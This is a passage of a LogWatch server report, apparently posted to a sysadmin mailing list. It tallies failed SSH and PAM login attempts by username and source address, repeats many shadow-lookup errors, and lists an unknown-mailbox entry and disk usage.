   test/password from 200.75.13.38: 5 Time(s)
   trash/none from 80.78.64.168: 2 Time(s)
   trash/password from 80.78.64.168: 2 Time(s)
   user/keyboard-interactive/pam from 189.43.21.244: 20 Time(s)
   user/keyboard-interactive/pam from 58.223.242.246: 15 Time(s)
   user/none from 189.43.21.244: 20 Time(s)
   user/none from 58.223.242.246: 15 Time(s)
   william/none from 80.78.64.168: 2 Time(s)
   william/password from 80.78.64.168: 2 Time(s)

User login attempt failed because:
   shell /sbin/nologin does not exist:
      alias : 2 Time(s)

Error in PAM authentication:
   User not known to the underlying authentication module for illegal user hostmaster from 211.94.209.19 : 7 Time(s)
   User not known to the underlying authentication module for illegal user hostmaster from 58.223.242.246 : 10 Time(s)
   User not known to the underlying authentication module for illegal user hostmaster from 89-96-108-166.ip12.fastwebnet.it : 2 Time(s)
   User not known to the underlying authentication module for illegal user user from 189.43.21.244 : 20 Time(s)
   User not known to the underlying authentication module for illegal user user from 58.223.242.246 : 15 Time(s)

**Unmatched Entries**
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER

 ---------------------- SSHD End ------------------------- 


 --------------------- Syslogd Begin ------------------------ 


Syslogd started 1 Time(s)

 ---------------------- Syslogd End ------------------------- 


 --------------------- vpopmail Begin ------------------------ 


No Such User Found:
	csantos@ - 4 Time(s)

 ---------------------- vpopmail End ------------------------- 



------------------ Disk Space --------------------

/dev/hda3              72G   35G   34G  52% /
/dev/hda1              92M  6.3M   81M   8% /boot


 ###################### LogWatch End ######################### 




More information about the Sysadmin mailing list